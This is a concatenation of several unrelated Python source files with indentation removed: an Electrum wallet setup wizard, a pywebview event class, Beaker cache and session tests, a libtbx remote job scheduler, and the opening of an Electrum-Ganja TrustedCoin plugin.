if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
self.logger.exception('')
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
event.py
|
import inspect
import multiprocessing
import threading
import logging
logger = logging.getLogger('pywebview')
class Event:
def __init__(self, should_lock=False):
self._items = []
self._should_lock = should_lock
self._event = threading.Event()
def _initialize(self, is_multiprocessing):
if is_multiprocessing:
self._event = multiprocessing.Event()
def set(self, *args, **kwargs):
def execute():
for func in self._items:
try:
if len(inspect.signature(func).parameters.values()) == 0:
value = func()
else:
value = func(*args, **kwargs)
return_values.add(value)
except Exception as e:
logger.exception(e)
if self._should_lock:
semaphore.release()
semaphore = threading.Semaphore(0)
return_values = set()
if len(self._items):
t = threading.Thread(target=execute)
t.start()
if self._should_lock:
semaphore.acquire()
false_values = [v for v in return_values if v is False]
self._event.set()
return len(false_values) != 0
def is_set(self):
return self._event.is_set()
def wait(self, timeout=0):
return self._event.wait(timeout)
def clear(self):
return self._event.clear()
def __add__(self, item):
self._items.append(item)
return self
def __sub__(self, item):
self._items.remove(item)
return self
def __iadd__(self, item):
self._items.append(item)
return self
def __isub__(self, item):
self._items.remove(item)
return self
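def _example_event_usage():
    # Illustrative usage sketch, not called anywhere in this module: handlers
    # subscribe with "+=" and unsubscribe with "-="; set() runs them on a worker
    # thread and returns True if any handler returned False (reliably so when the
    # event was constructed with should_lock=True, which makes set() wait for them).
    loaded = Event()
    def on_loaded():
        logger.debug('window loaded')
    loaded += on_loaded
    prevented = loaded.set()       # fire the subscribed handlers
    loaded.wait(timeout=1)         # blocks until set() has been called (or timeout)
    loaded -= on_loaded
    return prevented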
|
base.py
|
# coding: utf-8
import threading
import unittest
import time
import datetime
from beaker._compat import u_
from beaker.cache import Cache
from beaker.middleware import SessionMiddleware, CacheMiddleware
from webtest import TestApp as WebTestApp
class CacheManagerBaseTests(unittest.TestCase):
SUPPORTS_EXPIRATION = True
SUPPORTS_TIMEOUT = True
CACHE_ARGS = {}
@classmethod
def setUpClass(cls):
def simple_session_app(environ, start_response):
session = environ['beaker.session']
sess_id = environ.get('SESSION_ID')
if environ['PATH_INFO'].startswith('/invalid'):
# Attempt to access the session
id = session.id
session['value'] = 2
else:
if sess_id:
session = session.get_by_id(sess_id)
if not session:
start_response('200 OK', [('Content-type', 'text/plain')])
return [("No session id of %s found." % sess_id).encode('utf-8')]
if not session.has_key('value'):
session['value'] = 0
session['value'] += 1
if not environ['PATH_INFO'].startswith('/nosave'):
session.save()
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %d, session id is %s' % (session['value'],
session.id)).encode('utf-8')]
def simple_app(environ, start_response):
extra_args = cls.CACHE_ARGS
clear = False
if environ.get('beaker.clear'):
clear = True
cache = environ['beaker.cache'].get_cache('testcache', **extra_args)
if clear:
cache.clear()
try:
value = cache.get_value('value')
except:
value = 0
cache.set_value('value', value + 1)
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %s' % cache.get_value('value')).encode('utf-8')]
def using_none_app(environ, start_response):
extra_args = cls.CACHE_ARGS
clear = False
if environ.get('beaker.clear'):
clear = True
cache = environ['beaker.cache'].get_cache('testcache', **extra_args)
if clear:
cache.clear()
try:
value = cache.get_value('value')
except:
value = 10
cache.set_value('value', None)
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %s' % value).encode('utf-8')]
def cache_manager_app(environ, start_response):
cm = environ['beaker.cache']
cm.get_cache('test')['test_key'] = 'test value'
start_response('200 OK', [('Content-type', 'text/plain')])
yield ("test_key is: %s\n" % cm.get_cache('test')['test_key']).encode('utf-8')
cm.get_cache('test').clear()
try:
test_value = cm.get_cache('test')['test_key']
except KeyError:
yield "test_key cleared".encode('utf-8')
else:
yield (
"test_key wasn't cleared, is: %s\n" % cm.get_cache('test')['test_key']
).encode('utf-8')
cls.simple_session_app = staticmethod(simple_session_app)
cls.simple_app = staticmethod(simple_app)
cls.using_none_app = staticmethod(using_none_app)
cls.cache_manager_app = staticmethod(cache_manager_app)
def setUp(self):
Cache('test', **self.CACHE_ARGS).clear()
def test_session(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, **self.CACHE_ARGS))
res = app.get('/')
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_session_invalid(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, **self.CACHE_ARGS))
res = app.get('/invalid', headers=dict(
Cookie='beaker.session.id=df7324911e246b70b5781c3c58328442; Path=/'))
assert 'current value is: 2' in res
def test_session_timeout(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, timeout=1, **self.CACHE_ARGS))
session = app.app._get_session()
session.save()
if self.SUPPORTS_TIMEOUT:
assert session.namespace.timeout == 121
res = app.get('/')
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_has_key(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value("test", o)
assert cache.has_key("test")
assert "test" in cache
assert not cache.has_key("foo")
assert "foo" not in cache
cache.remove_value("test")
assert not cache.has_key("test")
def test_clear(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value('test', 20)
cache.set_value('fred', 10)
assert cache.has_key('test')
assert 'test' in cache
assert cache.has_key('fred')
cache.clear()
assert not cache.has_key("test")
def test_has_key_multicache(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value("test", o)
assert cache.has_key("test")
assert "test" in cache
cache = Cache('test', **self.CACHE_ARGS)
assert cache.has_key("test")
def test_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value(u_('hiŏ'), o)
assert u_('hiŏ') in cache
assert u_('hŏa') not in cache
cache.remove_value(u_('hiŏ'))
assert u_('hiŏ') not in cache
def test_long_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
long_str = u_(
'Очень длинная строка, которая не влезает в сто двадцать восемь байт и поэтому не проходит ограничение в check_key, что очень прискорбно, не правда ли, друзья? Давайте же скорее исправим это досадное недоразумение!'
)
cache.set_value(long_str, o)
assert long_str in cache
cache.remove_value(long_str)
assert long_str not in cache
def test_spaces_in_unicode_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value(u_('hi ŏ'), o)
assert u_('hi ŏ') in cache
assert u_('hŏa') not in cache
cache.remove_value(u_('hi ŏ'))
assert u_('hi ŏ') not in cache
def test_spaces_in_keys(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24)
assert cache.has_key("has space")
assert 24 == cache.get_value("has space")
cache.set_value("hasspace", 42)
assert cache.has_key("hasspace")
assert 42 == cache.get_value("hasspace")
def test_increment(self):
app = WebTestApp(CacheMiddleware(self.simple_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
app = WebTestApp(CacheMiddleware(self.simple_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_cache_manager(self):
app = WebTestApp(CacheMiddleware(self.cache_manager_app))
res = app.get('/')
assert 'test_key is: test value' in res
assert 'test_key cleared' in res
def test_store_none(self):
app = WebTestApp(CacheMiddleware(self.using_none_app))
res = app.get('/', extra_environ={'beaker.clear': True})
assert 'current value is: 10' in res
res = app.get('/')
assert 'current value is: None' in res
def test_expiretime(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24, expiretime=1)
assert cache.has_key("has space")
time.sleep(1.1)
assert not cache.has_key("has space")
def test_expiretime_automatic(self):
if not self.SUPPORTS_EXPIRATION:
self.skipTest('NamespaceManager does not support automatic expiration')
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value("has space", 24, expiretime=1)
assert cache.namespace.has_key("has space")
time.sleep(1.1)
assert not cache.namespace.has_key("has space")
def test_createfunc(self):
cache = Cache('test', **self.CACHE_ARGS)
def createfunc():
createfunc.count += 1
return createfunc.count
createfunc.count = 0
def keepitlocked():
lock = cache.namespace.get_creation_lock('test')
lock.acquire()
keepitlocked.acquired = True
time.sleep(1.0)
lock.release()
keepitlocked.acquired = False
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 1)
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 1)
cache.remove_value('test')
begin = datetime.datetime.utcnow()
t = threading.Thread(target=keepitlocked)
t.start()
while not keepitlocked.acquired:
# Wait for the thread that should lock the cache to start.
time.sleep(0.001)
v0 = cache.get_value('test', createfunc=createfunc)
self.assertEqual(v0, 2)
# Ensure that the `get_value` was blocked by the concurrent thread.
assert datetime.datetime.utcnow() - begin > datetime.timedelta(seconds=1)
t.join()
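# Illustrative sketch (the backend name and flag value are assumptions): backend-specific
# test modules reuse this suite by subclassing it and overriding the class attributes, e.g.
#
#   class MemoryBackendTests(CacheManagerBaseTests):
#       SUPPORTS_EXPIRATION = False
#       CACHE_ARGS = {'type': 'memory'}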
|
remote.py
|
from __future__ import absolute_import, division, print_function
from libtbx.queuing_system_utils import communication
from six.moves import cPickle as pickle
import threading
from six.moves import queue
import time
class SchedulerActor(object):
"""
Interface to a scheduling.Manager object that is polled by another thread
"""
def __init__(self, manager, waittime):
self.manager = manager
self.waittime = waittime
self.jobs_in = queue.Queue()
self.jobs_out = queue.Queue()
self.identifier_for = {}
self.active = True
self.daemon = threading.Thread( target = self.run )
self.daemon.daemon = True
self.daemon.start()
def run(self):
while self.active:
self.manager.poll()
while self.manager.completed_results:
current = self.manager.completed_results[0]
assert current.identifier in self.identifier_for
try:
self.jobs_out.put(
( self.identifier_for[ current.identifier ], current ),
block = False,
)
except queue.Full:
break
self.manager.completed_results.popleft()
del self.identifier_for[ current.identifier ]
while True:
try:
( identifier, ( target, args, kwargs ) ) = self.jobs_in.get( block = False )
except queue.Empty:
break
i = self.manager.submit( target = target, args = args, kwargs = kwargs )
assert i not in self.identifier_for
self.identifier_for[ i ] = identifier
if not self.manager.completed_results:
time.sleep( self.waittime )
self.manager.join()
for result in self.manager.results:
assert result.identifier in self.identifier_for
self.jobs_out.put( ( self.identifier_for[ result.identifier ], result ) )
del self.identifier_for[ result.identifier ]
def shutdown(self):
self.active = False
self.daemon.join()
class SubmitJobs(communication.Command):
"""
Request for job submission
"""
def __init__(self, job_infos):
self.job_infos = job_infos
def process(self, environment):
for ( identifier, callparms ) in self.job_infos:
environment.jobs_in.put( ( identifier, callparms ) )
class GetJobs(communication.Command):
def process(self, environment):
jobs = []
while True:
try:
jres = environment.jobs_out.get( block = False )
except queue.Empty:
break
jobs.append( jres )
return jobs
class SchedulerServer(communication.Server):
"""
Server-side component
"""
def __init__(self, instream, outstream, manager, waittime = 0.1):
super( SchedulerServer, self ).__init__(
instream = instream,
outstream = outstream,
environment = SchedulerActor( manager = manager, waittime = waittime ),
)
class SchedulerClient(communication.Client):
"""
Client-side connection to a potentially remote SchedulerServer
"""
def __init__(self, instream, outstream, waittime = 1, submittime = 0.5, poolsize = 4):
super(SchedulerClient, self).__init__(
instream = instream,
outstream = outstream,
)
self.running = set()
self.result_for = {}
self.waiting = []
self.waittime = waittime
self.submittime = submittime
self.polltime = time.time() # assume queue is empty
self.enqueuetime = self.polltime
self.poolsize = poolsize
def is_known(self, identifier):
return identifier in self.running or identifier in self.result_for
def submit(self, identifier, target, args, kwargs):
assert not self.is_known( identifier = identifier )
if not self.waiting:
self.enqueuetime = time.time()
self.waiting.append( ( identifier, ( target, args, kwargs ) ) )
self.running.add( identifier )
self.poll()
def is_alive(self, identifier):
self.poll()
return identifier not in self.result_for
def get_result(self, identifier):
return self.result_for[ identifier ]
def remove(self, identifier):
del self.result_for[ identifier ]
def poll(self):
now = time.time()
if self.running and ( self.waittime < ( now - self.polltime ) or now < self.polltime ):
response = self.send( command = GetJobs() )
jobs = response()
for ( identifier, value ) in jobs:
assert identifier in self.running
self.running.remove( identifier )
assert identifier not in self.result_for
self.result_for[ identifier ] = value
now = time.time()
self.polltime = now
if (
( self.poolsize <= len( self.waiting ) )
or ( self.waiting
and ( self.submittime < ( now - self.enqueuetime ) or now < self.enqueuetime )
)
):
response = self.send( command = SubmitJobs( job_infos = self.waiting ) )
try:
response()
except Exception as e:
raise RuntimeError("Submission failure: %s" % e)
self.waiting = []
def Job(self, target, args = (), kwargs = {}):
return Job(
handler = self,
target = target,
args = args,
kwargs = kwargs,
)
class PreSubmissionStatus(object):
"""
A job that has not been submitted yet
"""
@staticmethod
def start(job):
job.handler.submit(
identifier = job.name,
target = job.target,
args = job.args,
kwargs = job.kwargs,
)
job.status = RunningStatus
@staticmethod
def is_alive(job):
raise RuntimeError("job has not been submitted yet")
class RunningStatus(object):
"""
A job that has been submitted
"""
@staticmethod
def start(job):
raise RuntimeError("start called second time")
@staticmethod
def is_alive(job):
alive = job.handler.is_alive( identifier = job.name )
if not alive:
job.result = job.handler.get_result( identifier = job.name )
job.handler.remove( identifier = job.name )
job.status = FinishedStatus
return alive
class FinishedStatus(object):
"""
    A job that has finished
"""
@staticmethod
def start(job):
raise RuntimeError("start called second time")
@staticmethod
def is_alive(job):
return False
class Job(object):
"""
Job object to execute function calls on remote machines accessible via
a network channel
    Restrictions: target, args and kwargs have to be pickleable
"""
def __init__(self, handler, target, args = (), kwargs = {}):
self.handler = handler
self.target = target
self.args = args
self.kwargs = kwargs
self.status = PreSubmissionStatus
self.result = None
self.exitcode = 0
@property
def name(self):
return "remote_job_%d" % id( self )
def start(self):
self.status.start( job = self )
def is_alive(self):
return self.status.is_alive( job = self )
def join(self):
while self.is_alive():
time.sleep( 0.1 )
def __str__(self):
return "%s(name = '%s')" % ( self.__class__.__name__, self.name )
class RemoteFactory(object):
"""
    Remote instance method factory. There is no check that the instance
    actually has the method named in the constructor
"""
def __init__(self, calculation, method):
from libtbx.object_oriented_patterns import lazy_initialization
self.instance = lazy_initialization( func = calculation )
self.method = method
def __call__(self, *args, **kwargs):
return getattr( self.instance(), self.method )( *args, **kwargs )
def object_to_argument(obj):
return pickle.dumps( obj, 0 )
def argument_to_object(arg):
return pickle.loads( arg.decode( "string-escape" ) )
def command_merge(cmdline):
return "%s %r %r %s" % cmdline
def command_unmerge(cmdline):
return cmdline
def server_process_command_line(
job_factory,
queue_factory,
executable = "libtbx.remote_processing",
folder = ".",
transformation = command_merge,
):
return transformation(
cmdline = (
executable,
object_to_argument( obj = job_factory ),
object_to_argument( obj = queue_factory ),
"--folder=%s" % folder,
),
)
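def _example_job_usage(client):
    # Illustrative usage sketch, not called anywhere in this module: `client` is
    # assumed to be a SchedulerClient already connected to a running SchedulerServer.
    # Job mirrors the multiprocessing.Process lifecycle: start(), is_alive(), join().
    job = client.Job(target=pow, args=(2, 10))
    job.start()
    job.join()
    return job.result              # whatever result object the manager produced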
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum-Ganja - Lightweight Ganjacoin Client
# Copyright (C) 2015 Thomas Voegtlin
# Copyright (C) 2018 GanjaProject
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
import time
import hashlib
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_ganja as electrum
from electrum_ganja import ganja, ecc
from electrum_ganja import constants
from electrum_ganja import keystore
from electrum_ganja.ganja import *
from electrum_ganja.mnemonic import Mnemonic
from electrum_ganja import version
from electrum_ganja.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_ganja.i18n import _
from electrum_ganja.plugins import BasePlugin, hook
from electrum_ganja.util import NotEnoughFunds
from electrum_ganja.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
